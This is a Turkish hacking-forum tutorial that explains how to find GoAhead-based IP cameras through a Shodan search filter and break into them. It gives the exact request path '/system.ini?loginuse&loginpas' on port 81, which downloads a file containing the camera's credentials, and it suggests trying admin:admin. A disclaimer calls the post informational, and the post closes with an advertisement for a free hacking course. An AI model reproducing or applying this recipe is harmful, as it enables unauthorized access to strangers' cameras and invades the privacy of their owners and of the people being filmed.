Konuya başlamadan önce hiç bir sorumluluk kabul etmiyorum burası bir siber güvenlik platformu ve konum sadece bilgi amaçlıdır.







Shodan

Shodan, kullanıcının internete bağlı bilgisayar, server, kamera gibi cihazları bulmasını sağlayan bir arama motorudur.




Web site açıkları



Bir çok web sitesi açığı bulunuyor, bugün biz cihazın hangi url adresinde, sistem dosyalarını sakladığını bildiğimiz için istek atmamız yeterli olacak. Kod:
/system.ini?loginuse&loginpas



Analiz etme



Son olarak indirdiğimiz sistem dosyasının içinden şifreyi ayıklamamız gerekiyor çok basit gözümüzü korkutmayalım :)




Siteye giriş yapalım.
Kod:
https://www.shodan.io/

Arama kısmına bu arama filtresini girelim;
Kod:
realm = "GoAhead", domain = ": 81"


İnternet'e bağlı olan kameraların ip adresleri listelendi, benim gibi herhangi bir ip adresini bulup yeni sekmede girin.


Burası çok önemli sonuna :81 portunu ekleyelim port dediysem kafanız karışmasın sadece ip adresinin sonun :81 eklemeniz yeterli. ENTER basalım. Şifresi admin:admin olabilir deneyin eğer değilse okumaya devam edin



:81 portunu ekledik şimdi bu paremetreleri ekleyelim ve enter tuşuna basalım


Kod:
/system.ini?loginuse&loginpas


Bilgisayarımıza system.ini dosya adında bir dosya inecek bu dosyayı açtığımızda şifreyi ve username'i bulabileceğiz.




YouTube


BİLGİ AMAÇLIDIR BURASI BİR SİBER GÜVENLİK PLATFORMUDUR BUNU GÖSTERMESSEM GELİŞEMEYİZ.





Profesyonel kişiler tarafından hazırlanan bu eğitim 2021 Ocak ayında herkese ücretsiz bir şekilde açıldı.
Bu eğitim seti hacker olmak isteyen kişiler ve ücretsiz hack eğitimi arayan kişiler için inanılmaz bir fırsattır.




Eğitime ulaşmak için;
https://www.turkhackteam.org/web-ser...-ucretsiz.html